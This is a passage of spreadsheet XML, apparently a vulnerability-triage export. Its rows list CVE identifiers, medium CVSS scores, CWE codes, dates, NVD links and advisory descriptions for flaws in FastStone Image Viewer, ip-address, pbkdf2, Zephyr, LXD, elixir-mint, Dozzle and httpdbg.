      <c r="G183" s="5" t="inlineStr"/>
      <c r="H183" s="5" t="inlineStr"/>
      <c r="I183" s="5" t="inlineStr"/>
      <c r="J183" s="5" t="inlineStr"/>
      <c r="K183" s="5" t="inlineStr"/>
      <c r="L183" s="5" t="inlineStr"/>
      <c r="M183" s="5" t="inlineStr"/>
      <c r="N183" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O183" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P183" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q183" s="5" t="inlineStr"/>
      <c r="R183" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-787</t>
        </is>
      </c>
      <c r="S183" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been found in FastStone Image Viewer up to 8.3. The impacted element is an unknown function of the component 1bpp RLE Decoder. The manipulation leads to out-of-bounds write. The attack can be initiated remotely. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T183" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101203</t>
        </is>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B184" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C184" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101204</t>
        </is>
      </c>
      <c r="D184" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E184" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F184" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G184" s="5" t="inlineStr"/>
      <c r="H184" s="5" t="inlineStr"/>
      <c r="I184" s="5" t="inlineStr"/>
      <c r="J184" s="5" t="inlineStr"/>
      <c r="K184" s="5" t="inlineStr"/>
      <c r="L184" s="5" t="inlineStr"/>
      <c r="M184" s="5" t="inlineStr"/>
      <c r="N184" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O184" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P184" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q184" s="5" t="inlineStr"/>
      <c r="R184" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-125</t>
        </is>
      </c>
      <c r="S184" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in FastStone Image Viewer up to 8.3. This affects an unknown function of the file FSViewer.exe of the component TGA Image Handler. The manipulation results in out-of-bounds read. The attack can be launched remotely. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101204</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B185" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101205</t>
        </is>
      </c>
      <c r="D185" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E185" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F185" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G185" s="5" t="inlineStr"/>
      <c r="H185" s="5" t="inlineStr"/>
      <c r="I185" s="5" t="inlineStr"/>
      <c r="J185" s="5" t="inlineStr"/>
      <c r="K185" s="5" t="inlineStr"/>
      <c r="L185" s="5" t="inlineStr"/>
      <c r="M185" s="5" t="inlineStr"/>
      <c r="N185" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O185" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P185" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q185" s="5" t="inlineStr"/>
      <c r="R185" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-125</t>
        </is>
      </c>
      <c r="S185" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in FastStone Image Viewer up to 8.3. This impacts an unknown function of the component PCX Decoder. This manipulation causes out-of-bounds read. The attack may be initiated remotely. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101205</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B186" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101911</t>
        </is>
      </c>
      <c r="D186" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E186" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F186" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G186" s="5" t="inlineStr"/>
      <c r="H186" s="5" t="inlineStr"/>
      <c r="I186" s="5" t="inlineStr"/>
      <c r="J186" s="5" t="inlineStr"/>
      <c r="K186" s="5" t="inlineStr"/>
      <c r="L186" s="5" t="inlineStr"/>
      <c r="M186" s="5" t="inlineStr"/>
      <c r="N186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O186" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P186" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q186" s="5" t="inlineStr"/>
      <c r="R186" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="S186" s="5" t="inlineStr">
        <is>
          <t>ip-address is a library for parsing and manipulating IPv4 and IPv6 addresses in JavaScript. Prior to 10.7.1, the Address6 constructor, Address6.isValid, and parse code in src/ipv6.ts accept unbounded strings and expand invalid characters through RE_BAD_CHARACTERS into large diagnostics. Material impact occurs only when an application accepts a very large attacker-controlled field and passes it to Address6 parsing without an earlier length bound. Common URL and header limits, and common body-parser defaults, generally constrain the effect; common defaults typically exclude 32 MiB fields. Megabyte-scale fields can cause a synchronous stall and high transient memory use, approximately 16 MiB can trigger an invalid string length exception, and process termination occurs at approximately 32 MiB. The affected entry points include Address6.isValid and construction paths that reach parse. This issue is fixed in version 10.7.1.</t>
        </is>
      </c>
      <c r="T186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101911</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B187" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101912</t>
        </is>
      </c>
      <c r="D187" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E187" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F187" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G187" s="5" t="inlineStr"/>
      <c r="H187" s="5" t="inlineStr"/>
      <c r="I187" s="5" t="inlineStr"/>
      <c r="J187" s="5" t="inlineStr"/>
      <c r="K187" s="5" t="inlineStr"/>
      <c r="L187" s="5" t="inlineStr"/>
      <c r="M187" s="5" t="inlineStr"/>
      <c r="N187" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O187" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P187" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q187" s="5" t="inlineStr"/>
      <c r="R187" s="5" t="inlineStr">
        <is>
          <t>CWE-697, CWE-843</t>
        </is>
      </c>
      <c r="S187" s="5" t="inlineStr">
        <is>
          <t>ip-address is a library for parsing and manipulating IPv4 and IPv6 addresses in JavaScript. Prior to 10.7.1, the isInSubnet and isHostInSubnet methods in src/common.ts compare masked binary strings without validating that both operands use the same IP family. A cross-family containment check whose leading address bits match makes the masked strings compare equal even though IPv4 and IPv6 do not share an address space. An allowlist or denylist decision can therefore classify an address outside the intended range as contained. This issue is fixed in version 10.7.1.</t>
        </is>
      </c>
      <c r="T187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101912</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B188" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101913</t>
        </is>
      </c>
      <c r="D188" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E188" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F188" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G188" s="5" t="inlineStr"/>
      <c r="H188" s="5" t="inlineStr"/>
      <c r="I188" s="5" t="inlineStr"/>
      <c r="J188" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K188" s="5" t="inlineStr"/>
      <c r="L188" s="5" t="inlineStr">
        <is>
          <t>npm:ip-address</t>
        </is>
      </c>
      <c r="M188" s="5" t="inlineStr">
        <is>
          <t>10.5.1</t>
        </is>
      </c>
      <c r="N188" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O188" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P188" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q188" s="5" t="inlineStr"/>
      <c r="R188" s="5" t="inlineStr">
        <is>
          <t>CWE-697, CWE-918</t>
        </is>
      </c>
      <c r="S188" s="5" t="inlineStr">
        <is>
          <t>ip-address is a library for parsing and manipulating IPv4 and IPv6 addresses in JavaScript. Prior to 10.5.1, the Address6 isLinkLocal method in src/ipv6.ts recognizes only fe80::/64 instead of the complete fe80::/10 IPv6 link-local range. An attacker-controlled address elsewhere in fe80::/10 can therefore pass a trust-boundary check that relies on isLinkLocal. The same address is identified as link-local by getType and getScope, exposing the inconsistent classification. A successful bypass can reach an on-link host outside the intended trust boundary. This issue is fixed in version 10.5.1.</t>
        </is>
      </c>
      <c r="T188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101913</t>
        </is>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B189" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102414</t>
        </is>
      </c>
      <c r="D189" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E189" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F189" s="5" t="inlineStr">
        <is>
          <t>7ffcee3d-2c14-4c3e-b844-86c6a321a158</t>
        </is>
      </c>
      <c r="G189" s="5" t="inlineStr"/>
      <c r="H189" s="5" t="inlineStr"/>
      <c r="I189" s="5" t="inlineStr"/>
      <c r="J189" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="K189" s="5" t="inlineStr"/>
      <c r="L189" s="5" t="inlineStr"/>
      <c r="M189" s="5" t="inlineStr"/>
      <c r="N189" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O189" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P189" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q189" s="5" t="inlineStr"/>
      <c r="R189" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S189" s="5" t="inlineStr">
        <is>
          <t>pbkdf2 through 3.1.6 re-hashes passwords longer than the digest's block size on every iteration in its JavaScript fallback (lib/sync.js). A password longer than the block size (64 bytes, or 128 bytes for sha384 and sha512) is passed to HMAC as the key on every iteration, and HMAC hashes such keys in full each time. Cost is therefore O(iterations × password length), and a long password can block the event loop. The fallback is used by pbkdf2Sync and pbkdf2 on Node.js before 0.12, on Bun (1.0.0 through 1.1.34, and 1.2.6 and later), and on Deno 2.9.0 and later, because their native pbkdf2Sync fails the library's feature check. It is also used when lib/sync.js is imported directly. Node.js 0.12 and later, and browser builds (which use lib/sync-browser.js), are not affected. Applications that enforce a reasonable maximum password length are not meaningfully affected.</t>
        </is>
      </c>
      <c r="T189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102414</t>
        </is>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B190" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18415</t>
        </is>
      </c>
      <c r="D190" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E190" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F190" s="5" t="inlineStr">
        <is>
          <t>vulnerabilities@zephyrproject.org</t>
        </is>
      </c>
      <c r="G190" s="5" t="inlineStr"/>
      <c r="H190" s="5" t="inlineStr"/>
      <c r="I190" s="5" t="inlineStr"/>
      <c r="J190" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K190" s="5" t="inlineStr"/>
      <c r="L190" s="5" t="inlineStr"/>
      <c r="M190" s="5" t="inlineStr"/>
      <c r="N190" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O190" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P190" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q190" s="5" t="inlineStr"/>
      <c r="R190" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S190" s="5" t="inlineStr">
        <is>
          <t>ieee802154_send() in subsys/net/l2/ieee802154/ieee802154.c copies the outgoing packet into a single fixed 125-byte transmit buffer (tx_frame_buf_pool, sized IEEE802154_MTU). In builds with CONFIG_NET_L2_IEEE802154_FRAGMENT enabled (the default whenever CONFIG_NET_6LO is set), the branch taken when 6LoWPAN fragmentation is not required performed an unchecked net_buf_add_mem(frame_buf, pkt_buf-&gt;data, pkt_buf-&gt;len). The only guard was __ASSERT_NO_MSG() inside net_buf_simple_add(), which is compiled out without CONFIG_ASSERT, so an oversized packet silently overran the frame buffer.
The defect is not reachable from the radio: for NET_AF_INET6 packets ieee802154_6lo_encode_pkt() compares the whole packet length against IEEE802154_MTU and takes the fragmentation path when it does not fit, so every buffer copied on the unfragmented branch is within bounds. It is reachable through NET_AF_PACKET sockets bound to an 802.15.4 interface: for NET_SOCK_RAW the 6LoWPAN block is skipped entirely and for NET_SOCK_DGRAM it returns early on the address-family test, leaving no length validation anywhere on the transmit path (net_context_sendto() and net_if_tx() apply none, and pkt_buffer_length() does not clamp the allocation for this L2).
An application — or, in a CONFIG_USERSPACE build, an unprivileged application thread using the zsock_socket()/zsock_sendto() syscalls — can therefore drive a supervisor-mode out-of-bounds write of chosen bytes past the 125-byte pool buffer. With the default CONFIG_NET_BUF_FIXED_DATA_SIZE of 128 bytes the overrun is bounded to roughly ll_hdr_len + 3 bytes; with CONFIG_NET_BUF_VARIABLE_DATA_SIZE a single storage buffer can be as large as CONFIG_NET_PKT_BUF_TX_DATA_POOL_SIZE, making the overrun far larger. The consequence is corruption of memory adjacent to the pool, with a crash or further compromise of kernel state as the practical impact.
The fix validates ll_hdr_len + net_pkt_get_len(pkt) + authtag_len against IEEE802154_MTU before any copy and adds a tailroom-checking copy_pkt_to_frame() helper that returns -EMSGSIZE instead of overrunning the buffer. The same change also linearizes the whole net_buf chain into one MAC frame, so packet storage boundaries no longer become frame boundaries on the wire.</t>
        </is>
      </c>
      <c r="T190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18415</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B191" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82929</t>
        </is>
      </c>
      <c r="D191" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E191" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F191" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G191" s="5" t="inlineStr"/>
      <c r="H191" s="5" t="inlineStr"/>
      <c r="I191" s="5" t="inlineStr"/>
      <c r="J191" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K191" s="5" t="inlineStr"/>
      <c r="L191" s="5" t="inlineStr"/>
      <c r="M191" s="5" t="inlineStr"/>
      <c r="N191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O191" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P191" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q191" s="5" t="inlineStr"/>
      <c r="R191" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="S191" s="5" t="inlineStr">
        <is>
          <t>mH-DEVELOPER smart home module uses the same hard-coded SSH host keys on every device, with no per-device key generation. An attacker who extracts these keys from the firmware can set up a rogue SSH server that clients will trust without warning, enabling man-in-the-middle attacks and credential interception.
This issue was fixed in version 3.0.30</t>
        </is>
      </c>
      <c r="T191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82929</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B192" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86335</t>
        </is>
      </c>
      <c r="D192" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E192" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F192" s="5" t="inlineStr">
        <is>
          <t>security@ubuntu.com</t>
        </is>
      </c>
      <c r="G192" s="5" t="inlineStr"/>
      <c r="H192" s="5" t="inlineStr"/>
      <c r="I192" s="5" t="inlineStr"/>
      <c r="J192" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K192" s="5" t="inlineStr"/>
      <c r="L192" s="5" t="inlineStr"/>
      <c r="M192" s="5" t="inlineStr"/>
      <c r="N192" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O192" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P192" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q192" s="5" t="inlineStr"/>
      <c r="R192" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S192" s="5" t="inlineStr">
        <is>
          <t>Missing Authorization in imageDownload in Canonical LXD before 5.0.10, 5.21.8, and 6.10 on Linux allows a project-restricted client to access private images from other projects via local fingerprint reuse during image or instance import requests.</t>
        </is>
      </c>
      <c r="T192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86335</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B193" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92103</t>
        </is>
      </c>
      <c r="D193" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E193" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F193" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G193" s="5" t="inlineStr"/>
      <c r="H193" s="5" t="inlineStr"/>
      <c r="I193" s="5" t="inlineStr"/>
      <c r="J193" s="5" t="inlineStr"/>
      <c r="K193" s="5" t="inlineStr"/>
      <c r="L193" s="5" t="inlineStr"/>
      <c r="M193" s="5" t="inlineStr"/>
      <c r="N193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O193" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P193" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q193" s="5" t="inlineStr"/>
      <c r="R193" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S193" s="5" t="inlineStr">
        <is>
          <t>Allocation of Resources Without Limits or Throttling vulnerability in elixir-mint mint allows a malicious HTTP/2 server to make the client hold up to about 16 MiB per connection in frames it should reject, consuming client memory.
Mint.HTTP2.Frame.decode_next/2 in lib/mint/http2/frame.ex compares a frame with the client's max_frame_size (16,384 bytes by default) only once the whole declared payload has arrived. Until then it returns :more, and Mint.HTTP2 keeps every received byte in the connection buffer. A server can declare a frame length of up to 16,777,215 bytes and withhold the last byte, keeping roughly 1,024 times the advertised limit buffered for as long as the connection stays open. The server has to send every byte the client buffers, so there is no amplification, and the buffer stops at the 24-bit frame length limit.
This issue affects mint: from 0.1.0 before 1.11.0.</t>
        </is>
      </c>
      <c r="T193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92103</t>
        </is>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B194" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94194</t>
        </is>
      </c>
      <c r="D194" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E194" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F194" s="5" t="inlineStr">
        <is>
          <t>6b3ad84c-e1a6-4bf7-a703-f496b71e49db</t>
        </is>
      </c>
      <c r="G194" s="5" t="inlineStr"/>
      <c r="H194" s="5" t="inlineStr"/>
      <c r="I194" s="5" t="inlineStr"/>
      <c r="J194" s="5" t="inlineStr">
        <is>
          <t>requests</t>
        </is>
      </c>
      <c r="K194" s="5" t="inlineStr"/>
      <c r="L194" s="5" t="inlineStr"/>
      <c r="M194" s="5" t="inlineStr"/>
      <c r="N194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O194" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P194" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q194" s="5" t="inlineStr"/>
      <c r="R194" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="S194" s="5" t="inlineStr">
        <is>
          <t>Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') vulnerability in elixir-mint mint allows a malicious HTTP/1 server to desynchronize an intermediary and the Mint client on a pooled connection, poisoning the responses to subsequent requests that share the connection.
message_body/1 in lib/mint/http1.ex selects chunked framing when chunked is the first coding listed in a response's Transfer-Encoding fields. RFC 9112 section 6.3 applies chunked framing only when chunked is the final coding, and otherwise reads the body until the server closes the connection. For a response such as Transfer-Encoding: chunked, gzip, an intermediary that follows the RFC treats every byte up to the close as the body, while Mint ends the body at the zero-length chunk and parses the remaining bytes as the response to the next request on the connection.
Mint also keeps the connection open after an HTTP/1.0 response, final or 1xx, that carries Transfer-Encoding and Connection: keep-alive. RFC 9112 section 6.1 requires treating the framing of such a message as faulty and closing the connection after it, so bytes after its chunked body are parsed as the response to the next request in the same way.
This issue affects mint: from 0.1.0 before 1.11.0.</t>
        </is>
      </c>
      <c r="T194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94194</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B195" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102332</t>
        </is>
      </c>
      <c r="D195" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E195" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G195" s="5" t="inlineStr"/>
      <c r="H195" s="5" t="inlineStr"/>
      <c r="I195" s="5" t="inlineStr"/>
      <c r="J195" s="5" t="inlineStr"/>
      <c r="K195" s="5" t="inlineStr"/>
      <c r="L195" s="5" t="inlineStr"/>
      <c r="M195" s="5" t="inlineStr"/>
      <c r="N195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O195" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P195" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q195" s="5" t="inlineStr"/>
      <c r="R195" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S195" s="5" t="inlineStr">
        <is>
          <t>Dozzle versions before 11.1.2 fail to sanitize container display names when building ZIP archive entry names in the log download endpoint. Attackers who can label containers can use path traversal sequences to write files outside the extraction directory when users download and extract logs.</t>
        </is>
      </c>
      <c r="T195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102332</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B196" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102333</t>
        </is>
      </c>
      <c r="D196" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E196" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G196" s="5" t="inlineStr"/>
      <c r="H196" s="5" t="inlineStr"/>
      <c r="I196" s="5" t="inlineStr"/>
      <c r="J196" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K196" s="5" t="inlineStr"/>
      <c r="L196" s="5" t="inlineStr"/>
      <c r="M196" s="5" t="inlineStr"/>
      <c r="N196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O196" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P196" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q196" s="5" t="inlineStr"/>
      <c r="R196" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S196" s="5" t="inlineStr">
        <is>
          <t>httpdbg before 2.2.1 fails to validate URL schemes in recorded HTTP request URLs rendered as clickable links in the web interface. Attackers controlling traffic recorded by httpdbg can supply javascript: scheme URLs that execute malicious scripts in the application origin when clicked, allowing access to captured request and response data including headers and tokens.</t>
        </is>
      </c>
      <c r="T196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102333</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B197" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102372</t>
        </is>
      </c>
      <c r="D197" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E197" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F197" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G197" s="5" t="inlineStr"/>
